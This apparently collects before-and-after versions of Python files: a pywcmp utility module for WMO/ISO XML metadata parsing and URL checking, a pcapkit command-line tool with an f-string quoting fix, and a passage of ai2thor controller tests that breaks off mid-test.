result['accessible'] = response.status < 300
result['mime-type'] = response.headers.get_content_type()
else:
result['accessible'] = True
if parsed_uri.scheme in ('https') and check_ssl is True:
result['ssl'] = True
else:
result['accessible'] = False
return result
def validate_iso_xml(xml):
"""
Perform XML Schema validation of ISO XML Metadata
:param xml: file or string of XML
:returns: `bool` of whether XML validates ISO schema
"""
userdir = get_userdir()
if not os.path.exists(userdir):
raise IOError(f'{userdir} does not exist')
if isinstance(xml, str):
xml = etree.fromstring(xml)
xsd = os.path.join(userdir, 'iso-all.xsd')
LOGGER.debug(f'Validating {xml} against schema {xsd}')
schema = etree.XMLSchema(etree.parse(xsd))
schema.assertValid(xml)
def parse_wcmp(content):
"""
Parse a buffer into an etree ElementTree
:param content: str of xml content
:returns: `lxml.etree._ElementTree` object of WCMP
"""
try:
exml = etree.parse(content)
except etree.XMLSyntaxError as err:
LOGGER.error(err)
raise RuntimeError('Syntax error')
root_tag = exml.getroot().tag
if root_tag != '{http://www.isotc211.org/2005/gmd}MD_Metadata':
raise RuntimeError('Does not look like a WCMP document!')
return exml
| # =================================================================
#
# Terms and Conditions of Use
#
# Unless otherwise noted, computer program source code of this
# distribution is covered under Crown Copyright, Government of
# Canada, and is distributed under the MIT License.
#
# The Canada wordmark and related graphics associated with this
# distribution are protected under trademark law and copyright law.
# No permission is granted to use them outside the parameters of
# the Government of Canada's corporate identity program. For
# more information, see
# http://www.tbs-sct.gc.ca/fip-pcim/index-eng.asp
#
# Copyright title to all 3rd party software distributed with this
# software is held by the respective copyright holders as noted in
# those files. Users are asked to read the 3rd Party Licenses
# referenced with those assets.
#
# Copyright (c) 2020-2021 Government of Canada
# Copyright (c) 2020-2021 IBL Software Engineering spol. s r. o.
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
import os
import ssl
import sys
from datetime import datetime, timezone, timedelta
from dateutil.parser import parse
from urllib.error import URLError
from urllib.request import urlopen
from urllib.parse import urlparse
from lxml import etree
LOGGER = logging.getLogger(__name__)
NAMESPACES = {
'gco': 'http://www.isotc211.org/2005/gco',
'gmd': 'http://www.isotc211.org/2005/gmd',
'gml': 'http://www.opengis.net/gml/3.2',
'gmx': 'http://www.isotc211.org/2005/gmx',
'xlink': 'http://www.w3.org/1999/xlink'
}
def get_cli_common_options(function):
"""
Define common CLI options
"""
import click
function = click.option('--verbosity', '-v',
type=click.Choice(
['ERROR', 'WARNING', 'INFO', 'DEBUG']),
help='Verbosity')(function)
function = click.option('--log', '-l', 'logfile',
type=click.Path(writable=True, dir_okay=False),
help='Log file')(function)
return function
def get_codelists():
"""
Helper function to assemble dict of ISO and WMO codelists
:param authority: code list authority (iso or wmo)
:returns: `dict` of ISO and WMO codelists
"""
codelists = {}
userdir = get_userdir()
codelist_files = {
'iso': f'{userdir}/schema/resources/Codelist/gmxCodelists.xml',
'wmo': f'{userdir}{os.sep}WMOCodeLists.xml'
}
for key, value in codelist_files.items():
codelists[key] = {}
xml = etree.parse(value)
for cld in xml.xpath('gmx:codelistItem/gmx:CodeListDictionary', namespaces=NAMESPACES):
identifier = cld.get(nspath_eval('gml:id'))
codelists[key][identifier] = []
for centry in cld.findall(nspath_eval('gmx:codeEntry/gmx:CodeDefinition/gml:identifier')):
codelists[key][identifier].append(centry.text)
return codelists
def get_string_or_anchor_value(parent) -> list:
"""
Returns list of strings (texts) from CharacterString or Anchor child elements of the given element
:param parent : The element to check
"""
values = []
value_elements = parent.findall(nspath_eval('gco:CharacterString')) + parent.findall(nspath_eval('gmx:Anchor'))
for element in value_elements:
values.append(element.text)
return values
def get_string_or_anchor_values(parent_elements: list) -> list:
"""
Returns list of strings (texts) from CharacterString or Anchor child elements of given parent_elements
:param parent_elements : List of parent elements of the CharacterString or Anchor to read.
"""
values = []
for parent in parent_elements:
values += get_string_or_anchor_value(parent)
return values
def get_keyword_info(main_keyword_element) -> tuple:
"""
Returns tuple with keywords, type value(s) and thesaurus(es) for given "MD_Keywords" element
:param main_keyword_element : The element to check
"""
keywords = main_keyword_element.findall(nspath_eval('gmd:keyword'))
type_element = get_codelist_values(main_keyword_element.findall(nspath_eval('gmd:type/gmd:MD_KeywordTypeCode')))
thesauruses = main_keyword_element.findall(nspath_eval('gmd:thesaurusName/gmd:CI_Citation/gmd:title'))
return keywords, type_element, thesauruses
def get_codelist_values(elements: list) -> list:
"""
Returns list of code list values as strings for all elements (except the ones with no value)
The value can be in the element attribute or text node.
:param elements : The elements to check
"""
values = []
for element in elements:
value = element.get('codeListValue')
if value is None:
value = element.text
if value is not None:
values.append(value)
return values
def parse_time_position(element) -> datetime:
"""
Returns datetime extracted from the given GML element or None if parsing failed.
The parsing is rather benevolent here to allow mixing of "Zulu" and "naive" time strings (and other oddities),
in the hope that all meteorological data refer to UTC.
:param element : XML / GML element (e.g. gml:beginPosition)
"""
indeterminate_pos = element.get('indeterminatePosition')
if indeterminate_pos is not None:
if indeterminate_pos in ["now", "unknown"]:
return datetime.now(timezone.utc)
elif indeterminate_pos == "before":
return datetime.now(timezone.utc) - timedelta(hours=24)
elif indeterminate_pos == "after":
return datetime.now(timezone.utc) + timedelta(hours=24)
else:
LOGGER.debug(f'Time point has unexpected value of indeterminatePosition: {indeterminate_pos}')
elif element.text is not None:
text_to_parse = element.text
if text_to_parse.endswith('Z'):
text_to_parse = text_to_parse[0:-1]
try:
dtg = parse(text_to_parse, fuzzy=True, ignoretz=True).replace(tzinfo=timezone.utc)
return dtg
except Exception as err:
msg = f'Invalid time string: {err}'
LOGGER.debug(msg)
return None
def get_userdir() -> str:
"""
Helper function to get userdir
:returns: user's home directory
"""
return f'{os.path.expanduser("~")}{os.sep}.pywcmp'
def nspath_eval(xpath: str) -> str:
"""
Return an etree friendly xpath based expanding namespace
into namespace URIs
:param xpath: xpath string with namespace prefixes
:returns: etree friendly xpath
"""
out = []
for chunk in xpath.split('/'):
if ':' in chunk:
namespace, element = chunk.split(':')
out.append(f'{{{NAMESPACES[namespace]}}}{element}')
else:
out.append(chunk)
return '/'.join(out)
def setup_logger(loglevel: str = None, logfile: str = None):
"""
Setup logging
:param loglevel: logging level
:param logfile: logfile location
:returns: void (creates logging instance)
"""
if loglevel is None and logfile is None: # no logging
return
if loglevel is None and logfile is not None:
loglevel = 'INFO'
log_format = \
'[%(asctime)s] %(levelname)s - %(message)s'
date_format = '%Y-%m-%dT%H:%M:%SZ'
loglevels = {
'CRITICAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'DEBUG': logging.DEBUG,
'NOTSET': logging.NOTSET,
}
loglevel = loglevels[loglevel]
if logfile is not None: # log to file
logging.basicConfig(level=loglevel, datefmt=date_format,
format=log_format, filename=logfile)
elif loglevel is not None: # log to stdout
logging.basicConfig(level=loglevel, datefmt=date_format,
format=log_format, stream=sys.stdout)
LOGGER.debug('Logging initialized')
def urlopen_(url: str):
"""
Helper function for downloading a URL
:param url: URL to download
:returns: `http.client.HTTPResponse`
"""
try:
response = urlopen(url)
except (ssl.SSLError, URLError) as err:
LOGGER.warning(err)
LOGGER.warning('Creating unverified context')
context = ssl._create_unverified_context()
response = urlopen(url, context=context)
return response
def check_url(url: str, check_ssl: bool, timeout: int = 30) -> dict:
"""
Helper function to check link (URL) accessibility
:param url: The URL to check
:param check_ssl: Whether the SSL/TLS layer verification shall be made
:param timeout: timeout, in seconds (default: 30)
:returns: `dict` with details about the link
"""
response = None
result = {
'mime-type': None,
'url-original': url
}
try:
if check_ssl is False:
LOGGER.debug('Creating unverified context')
result['ssl'] = False
context = ssl._create_unverified_context()
response = urlopen(url, context=context, timeout=timeout)
else:
response = urlopen(url, timeout=timeout)
except TimeoutError as err:
LOGGER.debug(f'Timeout error: {err}')
except (ssl.SSLError, URLError, ValueError) as err:
LOGGER.debug(f'SSL/URL error: {err}')
LOGGER.debug(err)
except Exception as err:
LOGGER.debug(f'Other error: {err}')
LOGGER.debug(err)
if response is None and check_ssl is True:
return check_url(url, False)
if response is not None:
result['url-resolved'] = response.url
parsed_uri = urlparse(response.url)
if parsed_uri.scheme in ('http', 'https'):
if response.status > 300:
LOGGER.debug(f'Request failed: {response}')
result['accessible'] = response.status < 300
result['mime-type'] = response.headers.get_content_type()
else:
result['accessible'] = True
if parsed_uri.scheme in ('https') and check_ssl is True:
result['ssl'] = True
else:
result['accessible'] = False
return result
def validate_iso_xml(xml):
"""
Perform XML Schema validation of ISO XML Metadata
:param xml: file or string of XML
:returns: `bool` of whether XML validates ISO schema
"""
userdir = get_userdir()
if not os.path.exists(userdir):
raise IOError(f'{userdir} does not exist')
if isinstance(xml, str):
xml = etree.fromstring(xml)
xsd = os.path.join(userdir, 'iso-all.xsd')
LOGGER.debug(f'Validating {xml} against schema {xsd}')
schema = etree.XMLSchema(etree.parse(xsd))
schema.assertValid(xml)
def parse_wcmp(content):
"""
Parse a buffer into an etree ElementTree
:param content: str of xml content
:returns: `lxml.etree._ElementTree` object of WCMP
"""
try:
exml = etree.parse(content)
except etree.XMLSyntaxError as err:
LOGGER.error(err)
raise RuntimeError('Syntax error')
root_tag = exml.getroot().tag
if root_tag != '{http://www.isotc211.org/2005/gmd}MD_Metadata':
raise RuntimeError('Does not look like a WCMP document!')
return exml
|
# -*- coding: utf-8 -*-
"""command line tool
:mod:`pcapkit.__main__` was originally the module file of
|jspcapy|_, which is now deprecated and merged with :mod:`pcapkit`.
"""
import argparse
import sys
import warnings
import emoji
from pcapkit.foundation.extraction import Extractor
from pcapkit.interface import JSON, PLIST, TREE
#: version number
__version__ = '0.15.5'
def get_parser():
"""CLI argument parser.
Returns:
argparse.ArgumentParser: Argument parser.
"""
parser = argparse.ArgumentParser(prog='pcapkit-cli',
description='PCAP file extractor and formatted dumper')
parser.add_argument('-V', '--version', action='version', version=__version__)
parser.add_argument('fin', metavar='input-file-name',
help=('The name of input pcap file. If ".pcap" omits, '
'it will be automatically appended.'))
parser.add_argument('-o', '--output', action='store', metavar='file-name', dest='fout',
help=('The name of input pcap file. If format extension '
'omits, it will be automatically appended.'))
parser.add_argument('-f', '--format', action='store', metavar='format', dest='format',
help=('Print a extraction report in the specified output '
'format. Available are all formats supported by '
'dictdumper, e.g.: json, plist, and tree.'))
parser.add_argument('-j', '--json', action='store_true', default=False,
help=('Display extraction report as json. This will yield '
'"raw" output that may be used by external tools. '
'This option overrides all other options.'))
parser.add_argument('-p', '--plist', action='store_true', default=False,
help=('Display extraction report as macOS Property List '
'(plist). This will yield "raw" output that may be '
'used by external tools. This option overrides all '
'other options.'))
parser.add_argument('-t', '--tree', action='store_true', default=False,
help=('Display extraction report as tree view text. This '
'will yield "raw" output that may be used by external '
'tools. This option overrides all other options.'))
parser.add_argument('-a', '--auto-extension', action='store_true', default=False,
help='If output file extension omits, append automatically.')
parser.add_argument('-v', '--verbose', action='store_false', default=True,
help='Show more information.')
parser.add_argument('-F', '--files', action='store_true', default=False,
help='Split each frame into different files.')
parser.add_argument('-E', '--engine', action='store', dest='engine', default='default', metavar='PKG',
help=('Indicate extraction engine. Note that except '
'default or pcapkit engine, all other engines '
'need support of corresponding packages.'))
parser.add_argument('-P', '--protocol', action='store', dest='protocol', default='null', metavar='PROTOCOL',
help='Indicate extraction stops after which protocol.')
parser.add_argument('-L', '--layer', action='store', dest='layer', default='None', metavar='LAYER',
help='Indicate extract frames until which layer.')
return parser
def main():
"""Entrypoint."""
parser = get_parser()
args = parser.parse_args()
warnings.simplefilter('ignore')
if args.format:
fmt = args.format
elif args.json:
fmt = JSON
elif args.plist:
fmt = PLIST
elif args.tree:
fmt = TREE
else:
fmt = None
extractor = Extractor(store=False, format=fmt,
fin=args.fin, fout=args.fout,
auto=args.verbose, files=args.files,
layer=args.layer, protocol=args.protocol,
engine=args.engine, extension=args.auto_extension)
if not args.verbose:
try:
print(emoji.emojize(f":police_car_light: Loading file {extractor.input!r}"))
except UnicodeEncodeError:
print(f"[*] Loading file {extractor.input!r}")
for _ in extractor:
print(f' - Frame {extractor.length:>3d}: {extractor.protocol}')
try:
print(emoji.emojize(f":beer_mug: Report file{"s" if args.files else ""} stored in {extractor.output!r}"))
except UnicodeEncodeError:
print(f"[*] Report file{"s" if args.files else ""} stored in {extractor.output!r}")
if __name__ == '__main__':
sys.exit(main())
| # -*- coding: utf-8 -*-
"""command line tool
:mod:`pcapkit.__main__` was originally the module file of
|jspcapy|_, which is now deprecated and merged with :mod:`pcapkit`.
"""
import argparse
import sys
import warnings
import emoji
from pcapkit.foundation.extraction import Extractor
from pcapkit.interface import JSON, PLIST, TREE
#: version number
__version__ = '0.15.5'
def get_parser():
"""CLI argument parser.
Returns:
argparse.ArgumentParser: Argument parser.
"""
parser = argparse.ArgumentParser(prog='pcapkit-cli',
description='PCAP file extractor and formatted dumper')
parser.add_argument('-V', '--version', action='version', version=__version__)
parser.add_argument('fin', metavar='input-file-name',
help=('The name of input pcap file. If ".pcap" omits, '
'it will be automatically appended.'))
parser.add_argument('-o', '--output', action='store', metavar='file-name', dest='fout',
help=('The name of input pcap file. If format extension '
'omits, it will be automatically appended.'))
parser.add_argument('-f', '--format', action='store', metavar='format', dest='format',
help=('Print a extraction report in the specified output '
'format. Available are all formats supported by '
'dictdumper, e.g.: json, plist, and tree.'))
parser.add_argument('-j', '--json', action='store_true', default=False,
help=('Display extraction report as json. This will yield '
'"raw" output that may be used by external tools. '
'This option overrides all other options.'))
parser.add_argument('-p', '--plist', action='store_true', default=False,
help=('Display extraction report as macOS Property List '
'(plist). This will yield "raw" output that may be '
'used by external tools. This option overrides all '
'other options.'))
parser.add_argument('-t', '--tree', action='store_true', default=False,
help=('Display extraction report as tree view text. This '
'will yield "raw" output that may be used by external '
'tools. This option overrides all other options.'))
parser.add_argument('-a', '--auto-extension', action='store_true', default=False,
help='If output file extension omits, append automatically.')
parser.add_argument('-v', '--verbose', action='store_false', default=True,
help='Show more information.')
parser.add_argument('-F', '--files', action='store_true', default=False,
help='Split each frame into different files.')
parser.add_argument('-E', '--engine', action='store', dest='engine', default='default', metavar='PKG',
help=('Indicate extraction engine. Note that except '
'default or pcapkit engine, all other engines '
'need support of corresponding packages.'))
parser.add_argument('-P', '--protocol', action='store', dest='protocol', default='null', metavar='PROTOCOL',
help='Indicate extraction stops after which protocol.')
parser.add_argument('-L', '--layer', action='store', dest='layer', default='None', metavar='LAYER',
help='Indicate extract frames until which layer.')
return parser
def main():
"""Entrypoint."""
parser = get_parser()
args = parser.parse_args()
warnings.simplefilter('ignore')
if args.format:
fmt = args.format
elif args.json:
fmt = JSON
elif args.plist:
fmt = PLIST
elif args.tree:
fmt = TREE
else:
fmt = None
extractor = Extractor(store=False, format=fmt,
fin=args.fin, fout=args.fout,
auto=args.verbose, files=args.files,
layer=args.layer, protocol=args.protocol,
engine=args.engine, extension=args.auto_extension)
if not args.verbose:
try:
print(emoji.emojize(f":police_car_light: Loading file {extractor.input!r}"))
except UnicodeEncodeError:
print(f"[*] Loading file {extractor.input!r}")
for _ in extractor:
print(f' - Frame {extractor.length:>3d}: {extractor.protocol}')
try:
print(emoji.emojize(f":beer_mug: Report file{'s' if args.files else ''} stored in {extractor.output!r}"))
except UnicodeEncodeError:
print(f"[*] Report file{'s' if args.files else ''} stored in {extractor.output!r}")
if __name__ == '__main__':
sys.exit(main())
|
# import pytest
import os
import string
import random
import copy
import json
import pytest
import warnings
import jsonschema
import numpy as np
from ai2thor.controller import Controller
from ai2thor.tests.constants import TESTS_DATA_DIR
from ai2thor.wsgi_server import WsgiServer
from ai2thor.fifo_server import FifoServer
from PIL import ImageChops, ImageFilter, Image
import glob
import re
TEST_SCENE = "FloorPlan28"
# Defining const classes to lessen the possibility of a misspelled key
class Actions:
AddThirdPartyCamera = "AddThirdPartyCamera"
UpdateThirdPartyCamera = "UpdateThirdPartyCamera"
class MultiAgentMetadata:
thirdPartyCameras = "thirdPartyCameras"
class ThirdPartyCameraMetadata:
position = "position"
rotation = "rotation"
fieldOfView = "fieldOfView"
def build_controller(**args):
default_args = dict(scene=TEST_SCENE, local_build=True)
default_args.update(args)
# during a ci-build we will get a warning that we are using a commit_id for the
# build instead of 'local'
with warnings.catch_warnings():
warnings.simplefilter("ignore")
c = Controller(**default_args)
# used for resetting
c._original_initialization_parameters = c.initialization_parameters
return c
_wsgi_controller = build_controller(server_class=WsgiServer)
_fifo_controller = build_controller(server_class=FifoServer)
_stochastic_controller = build_controller(agentControllerType="stochastic")
def skip_reset(controller):
# setting attribute on the last event so we can tell if the
# controller gets used since last event will change after each step
controller.last_event._pytest_skip_reset = True
# resetting on each use so that each tests works with
# the scene in a pristine state
def reset_controller(controller):
controller.initialization_parameters = copy.deepcopy(
controller._original_initialization_parameters
)
if not hasattr(controller.last_event, "_pytest_skip_reset"):
controller.reset(TEST_SCENE)
skip_reset(controller)
return controller
@pytest.fixture
def wsgi_controller():
return reset_controller(_wsgi_controller)
@pytest.fixture
def stochastic_controller():
return reset_controller(_stochastic_controller)
@pytest.fixture
def fifo_controller():
return reset_controller(_fifo_controller)
fifo_wsgi = [_fifo_controller, _wsgi_controller]
fifo_wsgi_stoch = [_fifo_controller, _wsgi_controller, _stochastic_controller]
BASE_FP28_POSITION = dict(x=-1.5, z=-1.5, y=0.901,)
BASE_FP28_LOCATION = dict(
**BASE_FP28_POSITION, rotation={"x": 0, "y": 0, "z": 0}, horizon=0, standing=True,
)
def teleport_to_base_location(controller: Controller):
assert (
controller.last_event.metadata["sceneName"].replace("_physics", "")
== TEST_SCENE
)
controller.step("TeleportFull", **BASE_FP28_LOCATION)
assert controller.last_event.metadata["lastActionSuccess"]
def setup_function(function):
for c in [_fifo_controller, _wsgi_controller, _stochastic_controller]:
reset_controller(c)
def teardown_module(module):
_wsgi_controller.stop()
_fifo_controller.stop()
_stochastic_controller.stop()
def assert_near(point1, point2, error_message=""):
assert point1.keys() == point2.keys(), error_message + "Keys mismatch."
for k in point1.keys():
assert abs(point1[k] - point2[k]) < 1e-3, (
error_message + f"for {k} key, {point1[k]} != {point2[k]}"
)
def test_stochastic_controller(stochastic_controller):
stochastic_controller.reset(TEST_SCENE)
assert stochastic_controller.last_event.metadata["lastActionSuccess"]
# Issue #514 found that the thirdPartyCamera image code was causing multi-agents to end
# up with the same frame
def test_multi_agent_with_third_party_camera(fifo_controller):
fifo_controller.reset(TEST_SCENE, agentCount=2)
assert not np.all(
fifo_controller.last_event.events[1].frame
== fifo_controller.last_event.events[0].frame
)
event = fifo_controller.step(
dict(
action="AddThirdPartyCamera",
rotation=dict(x=0, y=0, z=90),
position=dict(x=-1.0, z=-2.0, y=1.0),
)
)
assert not np.all(
fifo_controller.last_event.events[1].frame
== fifo_controller.last_event.events[0].frame
)
# Issue #526 thirdPartyCamera hanging without correct keys in FifoServer FormMap
def test_third_party_camera_with_image_synthesis(fifo_controller):
fifo_controller.reset(
TEST_SCENE,
renderInstanceSegmentation=True,
renderDepthImage=True,
renderSemanticSegmentation=True,
)
event = fifo_controller.step(
dict(
action="AddThirdPartyCamera",
rotation=dict(x=0, y=0, z=90),
position=dict(x=-1.0, z=-2.0, y=1.0),
)
)
assert len(event.third_party_depth_frames) == 1
assert len(event.third_party_semantic_segmentation_frames) == 1
assert len(event.third_party_camera_frames) == 1
assert len(event.third_party_instance_segmentation_frames) == 1
def test_rectangle_aspect(fifo_controller):
fifo_controller.reset(TEST_SCENE, width=600, height=300)
event = fifo_controller.step(dict(action="Initialize", gridSize=0.25))
assert event.frame.shape == (300, 600, 3)
def test_small_aspect(fifo_controller):
fifo_controller.reset(TEST_SCENE, width=128, height=64)
event = fifo_controller.step(dict(action="Initialize", gridSize=0.25))
assert event.frame.shape == (64, 128, 3)
def test_bot_deprecation(fifo_controller):
fifo_controller.reset(TEST_SCENE, agentMode="bot")
assert (
fifo_controller.initialization_parameters["agentMode"].lower() == "locobot"
), "bot should alias to locobot!"
def test_deprecated_segmentation_params(fifo_controller):
# renderObjectImage has been renamed to renderInstanceSegmentation
# renderClassImage has been renamed to renderSemanticSegmentation
fifo_controller.reset(
TEST_SCENE, renderObjectImage=True, renderClassImage=True,
)
event = fifo_controller.last_event
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=DeprecationWarning)
assert event.class_segmentation_frame is event.semantic_segmentation_frame
assert event.semantic_segmentation_frame is not None
assert (
event.instance_segmentation_frame is not None
), "renderObjectImage should still render instance_segmentation_frame"
def test_deprecated_segmentation_params2(fifo_controller):
# renderObjectImage has been renamed to renderInstanceSegmentation
# renderClassImage has been renamed to renderSemanticSegmentation
fifo_controller.reset(
TEST_SCENE, renderSemanticSegmentation=True, renderInstanceSegmentation=True,
)
event = fifo_controller.last_event
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=DeprecationWarning)
assert event.class_segmentation_frame is event.semantic_segmentation_frame
assert event.semantic_segmentation_frame is not None
assert (
event.instance_segmentation_frame is not None
), "renderObjectImage should still render instance_segmentation_frame"
def test_reset(fifo_controller):
width = 520
height = 310
event = fifo_controller.reset(
scene=TEST_SCENE, width=width, height=height, renderDepthImage=True
)
assert event.frame.shape == (height, width, 3), "RGB frame dimensions are wrong!"
assert event.depth_frame is not None, "depth frame should have rendered!"
assert event.depth_frame.shape == (
height,
width,
), "depth frame dimensions are wrong!"
width = 300
height = 300
event = fifo_controller.reset(
scene=TEST_SCENE, width=width, height=height, renderDepthImage=False
)
assert event.depth_frame is None, "depth frame shouldn't have rendered!"
assert event.frame.shape == (height, width, 3), "RGB frame dimensions are wrong!"
def test_fast_emit(fifo_controller):
event = fifo_controller.step(dict(action="RotateRight"))
event_fast_emit = fifo_controller.step(dict(action="TestFastEmit", rvalue="foo"))
event_no_fast_emit = fifo_controller.step(dict(action="LookUp"))
event_no_fast_emit_2 = fifo_controller.step(dict(action="RotateRight"))
assert event.metadata._raw_metadata["actionReturn"] is None
assert event_fast_emit.metadata._raw_metadata["actionReturn"] == "foo"
assert id(event.metadata._raw_metadata["objects"]) == id(
event_fast_emit.metadata._raw_metadata["objects"]
)
assert id(event.metadata._raw_metadata["objects"]) != id(
event_no_fast_emit.metadata._raw_metadata["objects"]
)
assert id(event_no_fast_emit_2.metadata._raw_metadata["objects"]) != id(
event_no_fast_emit.metadata._raw_metadata["objects"]
)
def test_fifo_large_input(fifo_controller):
random_string = "".join(
random.choice(string.ascii_letters) for i in range(1024 * 16)
)
event = fifo_controller.step(
dict(action="TestActionReflectParam", rvalue=random_string)
)
assert event.metadata["actionReturn"] == random_string
def test_fast_emit_disabled(fifo_controller):
slow_controller = fifo_controller
slow_controller.reset(TEST_SCENE, fastActionEmit=False)
event = slow_controller.step(dict(action="RotateRight"))
event_fast_emit = slow_controller.step(dict(action="TestFastEmit", rvalue="foo"))
# assert that when actionFastEmit is off that the objects are different
assert id(event.metadata["objects"]) != id(event_fast_emit.metadata["objects"])
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_lookdown(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
assert horizon == 0.0
e = controller.step(dict(action="LookDown"))
assert e.metadata["agent"]["position"] == position
assert round(e.metadata["agent"]["cameraHorizon"]) == 30
assert e.metadata["agent"]["rotation"] == dict(x=0, y=0, z=0)
e = controller.step(dict(action="LookDown"))
assert round(e.metadata["agent"]["cameraHorizon"]) == 60
e = controller.step(dict(action="LookDown"))
assert round(e.metadata["agent"]["cameraHorizon"]) == 60
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_no_leak_params(controller):
action = dict(action="RotateLook", rotation=0, horizon=0)
e = controller.step(action)
assert "sequenceId" not in action
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_target_invocation_exception(controller):
# TargetInvocationException is raised when short circuiting failures occur
# on the Unity side. It often occurs when invalid arguments are used.
event = controller.step("OpenObject", x=1.5, y=0.5)
assert not event.metadata["lastActionSuccess"], "OpenObject(x > 1) should fail."
assert event.metadata[
"errorMessage"
], "errorMessage should not be empty when OpenObject(x > 1)."
@pytest.mark.parametrize("controller", fifo_wsgi_stoch)
def test_lookup(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
assert horizon == 0.0
e = controller.step(dict(action="LookUp"))
assert e.metadata["agent"]["position"] == position
assert e.metadata["agent"]["cameraHorizon"] == -30.0
assert e.metadata["agent"]["rotation"] == dict(x=0, y=0, z=0)
e = controller.step(dict(action="LookUp"))
assert e.metadata["agent"]["cameraHorizon"] == -30.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_rotate_left(controller):
e = controller.step(dict(action="RotateLook", rotation=0, horizon=0))
position = controller.last_event.metadata["agent"]["position"]
rotation = controller.last_event.metadata["agent"]["rotation"]
assert rotation == dict(x=0, y=0, z=0)
horizon = controller.last_event.metadata["agent"]["cameraHorizon"]
e = controller.step(dict(action="RotateLeft"))
assert e.metadata["agent"]["position"] == position
assert e.metadata["agent"]["cameraHorizon"] == horizon
assert e.metadata["agent"]["rotation"]["y"] == 270.0
assert e.metadata["agent"]["rotation"]["x"] == 0.0
assert e.metadata["agent"]["rotation"]["z"] == 0.0
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_simobj_filter(controller):
objects = controller.last_event.metadata["objects"]
unfiltered_object_ids = sorted([o["objectId"] for o in objects])
filter_object_ids = sorted([o["objectId"] for o in objects[0:3]])
e = controller.step(dict(action="SetObjectFilter", objectIds=filter_object_ids))
assert len(e.metadata["objects"]) == len(filter_object_ids)
filtered_object_ids = sorted([o["objectId"] for o in e.metadata["objects"]])
assert filtered_object_ids == filter_object_ids
e = controller.step(dict(action="SetObjectFilter", objectIds=[]))
assert len(e.metadata["objects"]) == 0
e = controller.step(dict(action="ResetObjectFilter"))
reset_filtered_object_ids = sorted([o["objectId"] for o in e.metadata["objects"]])
assert unfiltered_object_ids == reset_filtered_object_ids
@pytest.mark.parametrize("controller", fifo_wsgi)
def test_add_third_party_camera(controller):
expectedPosition = dict(x=1.2, y=2.3, z=3.4)
expectedRotation = dict(x=30, y=40, z=50)
expectedFieldOfView = 45.0
assert (
len(controller.last_event.metadata[MultiAgentMetadata.thirdPartyCameras]) == 0
), "there should be 0 cameras"
e = controller.step(
dict(
action=Actions.AddThirdPartyCamera,
position=expectedPosition,
rotation=expectedRotation,
fieldOfView=expectedFieldOfView,
)
)
assert (
len(e.metadata[MultiAgentMetadata.thirdPartyCameras]) == 1
), "there should be 1 camera"
camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
assert_near(
camera[ThirdPartyCameraMetadata.position],
expectedPosition,
"initial position should have been set",
)
assert_near(
camera[ThirdPartyCameraMetadata.rotation],
expectedRotation,
"initial rotation should have been set",
)
assert (
camera[ThirdPartyCameraMetadata.fieldOfView] == expectedFieldOfView
), "initial fieldOfView should have been set"
# expects position to be a Vector3, should fail!
event = controller.step(
action="AddThirdPartyCamera", position=5, rotation=dict(x=0, y=0, z=0)
)
assert not event.metadata[
"lastActionSuccess"
], "position should not allow float input!"
# orthographicSize expects float, not Vector3!
error_message = None
try:
event = controller.step(
action="AddThirdPartyCamera",
position=dict(x=0, y=0, z=0),
rotation=dict(x=0, y=0, z=0),
orthographic=True,
orthographicSize=dict(x=0, y=0, z=0),
)
except ValueError as e:
error_message = str(e)
assert error_message.startswith(
"action: AddThirdPartyCamera has an invalid argument: orthographicSize"
)
def test_update_third_party_camera(fifo_controller):
# add a new camera
expectedPosition = dict(x=1.2, y=2.3, z=3.4)
expectedRotation = dict(x=30, y=40, z=50)
expectedFieldOfView = 45.0
e = fifo_controller.step(
dict(
action=Actions.AddThirdPartyCamera,
position=expectedPosition,
rotation=expectedRotation,
fieldOfView=expectedFieldOfView,
)
)
assert (
len(fifo_controller.last_event.metadata[MultiAgentMetadata.thirdPartyCameras])
== 1
), "there should be 1 camera"
# update camera pose fully
expectedPosition = dict(x=2.2, y=3.3, z=4.4)
expectedRotation = dict(x=10, y=20, z=30)
expectedInitialFieldOfView = 45.0
e = fifo_controller.step(
dict(
action=Actions.UpdateThirdPartyCamera,
thirdPartyCameraId=0,
position=expectedPosition,
rotation=expectedRotation,
)
)
camera = e.metadata[MultiAgentMetadata.thirdPartyCameras][0]
assert_near(
camera[ThirdPartyCameraMetadata.position],
expectedPosition,
"position should have been updated",
)
assert_near(
camera[ThirdPartyCameraMetadata.rotation],
expectedRotation,
"rotation should have been updated",
)
assert (
camera[ThirdPartyCameraMetadata.fieldOfView] == expectedInitialFieldOfView
), "fieldOfView should not have changed"
# partially update the camera pose
changeFOV = 55.0
expectedPosition2 = dict(x=3.2, z=5)
expectedRotation2 = dict(y=90)
e = fifo_controller.step(
